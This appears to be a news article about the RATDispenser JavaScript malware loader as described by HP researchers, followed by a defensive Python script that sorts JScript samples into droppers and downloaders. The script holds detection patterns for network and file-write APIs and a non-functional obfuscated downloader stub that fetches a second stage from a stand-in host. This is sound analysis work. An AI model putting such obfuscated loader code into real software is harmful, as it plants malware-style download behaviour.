This New Malware Can Evade Almost All Antiviruses

Malware is any software created with the goal of causing harm to a computer, server, client, or network. Malware is sometimes defined as software that secretly acts against the user’s best interests. To help prevent the introduction of malware, detect it when it is already present, and recover from malware-related destructive activity and attacks, a variety of antivirus software, firewalls, and other measures are used.

A new kind of malware has been found by HP security researchers: using an evasive JavaScript loader, attackers are distributing remote access Trojans (RATs) and information stealers. Security researchers at HP Wolf Security named the malware RATDispenser and have published a research blog on it. While JavaScript downloaders normally have a lower detection rate than other downloaders, the researchers say this specific malware is especially dangerous because it employs numerous tactics to evade detection.

Courtesy: HP Research

According to the blog, RATDispenser appears to be adept at evading security safeguards and delivering malware, with a detection rate of only 11 percent. During 2021, the researchers identified eight malware families that were spread using this loader. All of the payloads were remote access Trojans (RATs), designed to steal data and give attackers control over target machines.

RATDispenser is used to obtain an initial foothold on a system, as is the case with most JavaScript malware attacks, before launching secondary malware that takes control of the infected device. Surprisingly, we discovered that RATDispenser is mostly utilized as a dropper (in 94 percent of the samples examined), implying that the malware does not communicate over the network to deliver a dangerous payload. The authors of RATDispenser may be using a malware-as-a-service business model, given the diversity of malware families available, many of which can be purchased or downloaded for free from underground marketplaces, and malware operators’ propensity for dropping payloads.

Overview of RATDispenser variants and the malware families they delivered (image and caption credit: HP)

Further investigation revealed at least three different RATDispenser variants, totalling 155 samples over the last three months. While the bulk of these were droppers, ten were downloaders that communicated over the network to obtain a second stage of malware.
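The dropper-versus-downloader distinction drawn above (a dropper carries its payload embedded in the script and never touches the network; a downloader fetches a second stage) is something an analyst can triage statically before running a sample. The following script is an added example written for this page, not HP's tooling and not derived from RATDispenser itself. It assumes Windows Script Host JScript loaders, uses well-known WSH ProgIDs (MSXML2.XMLHTTP, WinHttp.WinHttpRequest, Scripting.FileSystemObject, ADODB.Stream, WScript.Shell) as indicators, and first undoes two light obfuscation tricks (String.fromCharCode sequences and string-literal concatenation) that would otherwise hide those indicators from plain string matching. The two sample inputs are constructed, non-functional stand-ins.

```python
import re
from dataclasses import dataclass, field

# Assumed heuristic indicators for WSH JScript loaders. These are generic
# ProgIDs/APIs chosen for this example, not indicators HP published.
NETWORK_INDICATORS = [
    r"MSXML2\.XMLHTTP", r"MSXML2\.ServerXMLHTTP", r"WinHttp\.WinHttpRequest",
    r"Microsoft\.XMLHTTP", r"https?://",
]
PAYLOAD_WRITE_INDICATORS = [
    r"Scripting\.FileSystemObject", r"ADODB\.Stream", r"WScript\.Shell",
]
# A long run of base64-alphabet characters suggests an embedded (dropped) payload.
EMBEDDED_BLOB = re.compile(r"[A-Za-z0-9+/=]{200,}")

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


def normalize(text: str) -> str:
    """Resolve String.fromCharCode(...) and "a"+"b" concatenations into literals."""
    def _fcc(m):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    text = FROMCHARCODE.sub(_fcc, text)
    prev = None
    while prev != text:  # repeat until no adjacent literals remain to join
        prev = text
        text = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
    return text


@dataclass
class Triage:
    classification: str
    network_hits: list = field(default_factory=list)
    write_hits: list = field(default_factory=list)
    embedded_blob_bytes: int = 0


def _find(patterns, text):
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def triage_script(raw: str) -> Triage:
    """Classify a JScript sample as downloader, dropper, suspicious or benign-looking."""
    text = normalize(raw)
    net = _find(NETWORK_INDICATORS, text)
    writes = _find(PAYLOAD_WRITE_INDICATORS, text)
    blob = max((len(m.group(0)) for m in EMBEDDED_BLOB.finditer(text)), default=0)
    if net:
        cls = "downloader"          # talks to the network for a second stage
    elif writes and blob:
        cls = "dropper"             # writes an embedded payload, no network use
    elif writes or blob:
        cls = "suspicious"
    else:
        cls = "benign-looking"
    return Triage(cls, net, writes, blob)


# Constructed, non-functional samples for demonstration only.
SAMPLE_DOWNLOADER = '''
var x = new ActiveXObject("MSX" + "ML2.XM" + "LHTTP");
x.open("GET", "http://example.invalid/stage2", false);
'''
SAMPLE_DROPPER = (
    'var fso = new ActiveXObject(String.fromCharCode(83,99,114,105,112,116,105,110,'
    '103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116));\n'
    'var blob = "' + "QUJD" * 60 + '";\n'
)

if __name__ == "__main__":
    for name, sample in (("downloader", SAMPLE_DOWNLOADER), ("dropper", SAMPLE_DROPPER)):
        print(name, "->", triage_script(sample))
```

The normalization step is deliberately narrow; a loader that builds strings through arbitrary arithmetic, `eval`, or a custom decoder will still slip past it, which is exactly why the page reports such low static detection rates and why dynamic analysis in a sandbox remains the more reliable way to confirm whether a sample reaches out to the network.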
